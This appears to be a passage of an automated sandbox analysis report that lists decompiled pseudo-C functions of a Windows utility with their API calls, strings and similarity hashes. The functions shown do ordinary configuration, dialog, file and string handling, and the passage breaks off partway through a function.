Uniqueness Score: -1.00%

Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				return E00402FC6(_t29, _t36,  &_v532);
			}

0x00402f3a
0x00402f51
0x00402f60
0x00402f6f
0x00402f78
0x00402f7a
0x00402f7a
0x00402f8a
0x00402f8f
0x00402f94
0x00402f99
0x00402f9e
0x00402f9f
0x00402fad
0x00402fb2
0x00402fb2
0x00402fc5

APIs

memset.MSVCRT ref: 00402F51

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 00402F6F
wcscat.MSVCRT ref: 00402F8A

Strings

.cfg, xrefs: 00402F84

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: .cfg
API String ID: 776488737-3410578098
Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}

0x00407e2d
0x00407e46
0x00407e48
0x00407e4d
0x00407e5f
0x00407e6b
0x00407e6f
0x00407e75
0x00407e7c
0x00407e7d
0x00407e88
0x00407e8d
0x00407e8e
0x00407eaa

APIs

memset.MSVCRT ref: 00407E48
memset.MSVCRT ref: 00407E5F

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407E8E

Strings

</%s>, xrefs: 00407E7D

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}

APIs

memset.MSVCRT ref: 00405E44
SetWindowTextW.USER32(?,?), ref: 00405E74
EnumChildWindows.USER32 ref: 00405E84

Strings

caption, xrefs: 00405E59

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC

Uniqueness

Uniqueness Score: -1.00%

Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}

0x00409a4a
0x00409a4f
0x00409a56
0x00409a5e
0x00409a60
0x00409a6e
0x00409a6e
0x00409a60
0x00409a71
0x00409a76
0x00000000
0x00409a78
0x00000000
0x00409a89

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68

Strings

winsta.dll, xrefs: 00409A51
Y@, xrefs: 00409A46
WinStationGetProcessSid, xrefs: 00409A62

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: WinStationGetProcessSid$winsta.dll$Y@
API String ID: 946536540-379566740
Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

APIs

??2@YAPAXI@Z.MSVCRT ref: 004058C3
memset.MSVCRT ref: 004058D4
memcpy.MSVCRT ref: 004058E0
??3@YAXPAX@Z.MSVCRT ref: 004058ED

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}

APIs

memset.MSVCRT ref: 00409E08

Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
memset.MSVCRT ref: 00409E3B
GetPrivateProfileStringW.KERNEL32 ref: 00409E5D

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}

APIs

SHGetMalloc.SHELL32(?), ref: 0040AD0C
SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
wcscpy.MSVCRT ref: 0040AD65

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}

APIs

GetDlgItem.USER32 ref: 00404A52
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x004072e0
0x004072f7
0x004072fd
0x00407316
0x00407342

APIs

memset.MSVCRT ref: 004072FD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
strlen.MSVCRT ref: 00407328
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}

0x00408dd0
0x00408dd2
0x00408de2
0x00408df4
0x00408e01
0x00408e1b
0x00408e21
0x00408e28
0x00408e30
0x00408dd4
0x00408dd8
0x00408dd8

APIs

memcpy.MSVCRT ref: 00408DE2
memcpy.MSVCRT ref: 00408DF4
GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
DialogBoxParamW.USER32 ref: 00408E1B

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC

Uniqueness

Uniqueness Score: -1.00%

Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}

0x004050e1
0x004050ec
0x004050ee
0x004050f5
0x004050ff
0x00405114
0x00405118
0x00405123
0x00405128
0x00405101
0x00405109
0x0040510f
0x0040512e

APIs

wcslen.MSVCRT ref: 004050E3
wcslen.MSVCRT ref: 004050EE
wcscat.MSVCRT ref: 00405109
wcsncat.MSVCRT ref: 00405123

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcslen$wcscatwcsncat
String ID:
API String ID: 291873006-0
Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD

Uniqueness

Uniqueness Score: -1.00%

Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}

0x00402de0
0x00402de2
0x00402dec
0x00402def
0x00402dfb
0x00402e0c
0x00402e0e
0x00402e0e
0x00402e16
0x00402e18
0x00402e1a
0x00402e21

APIs

GetClientRect.USER32 ref: 00402DEF
GetWindow.USER32(?,00000005), ref: 00402E07
GetWindow.USER32(00000000), ref: 00402E0A

Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3

GetWindow.USER32(00000000,00000002), ref: 00402E16

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientPoints
String ID:
API String ID: 4235085887-0
Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B6B0
??3@YAXPAX@Z.MSVCRT ref: 0040B6C0
??3@YAXPAX@Z.MSVCRT ref: 0040B6D0
??3@YAXPAX@Z.MSVCRT ref: 0040B6E0

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED

Uniqueness

Uniqueness Score: -1.00%

Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
